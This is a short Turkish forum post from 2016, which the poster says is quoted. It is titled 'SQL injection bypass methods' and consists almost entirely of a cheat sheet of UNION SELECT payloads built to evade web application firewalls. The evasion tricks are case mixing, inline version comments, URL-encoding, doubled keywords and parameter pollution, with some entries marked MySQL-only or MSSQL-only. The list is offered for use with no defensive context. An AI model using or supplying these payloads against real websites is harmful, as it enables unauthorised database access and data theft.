- 17 Mar 2016
- 629
- 1
SQL İNJECTİON BYPASS YÖNTEMLERİ;
Merhaba arkadaşlar bu konumda SQL injection için olabiliecek en yararlı bypass yöntemlerininden bahsedeceğim.
Alıntıdır. Vesselam arkadaşlar..
Merhaba arkadaşlar bu konumda SQL injection için olabiliecek en yararlı bypass yöntemlerininden bahsedeceğim.
Kod:
+uni*on+sel*ect+
+(UnI)(oN)+(SeL)(ecT)+
/*!u%6eion*/ /*!se%6cect*/
+and+(select 1)=(Select 0xAA[..(add
about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/
/!*union*/+/!*select*/+
UNunionİON+SEselect+
union+(select+1,2,3,4,5)--
+(UnIoN)+(SelECT)+
+UnIOn+SeLECT
deger=1+UnIoN/*&laz=*/SeLeCT/*&a=*/1,database()Â -
union /*!select*/+
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%)and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--+
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+UnIOn+SeLECT <-MySQL only
id=1+UnI||on+SeLeCT <-MSSQL only
UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
Alıntıdır. Vesselam arkadaşlar..
Son düzenleme: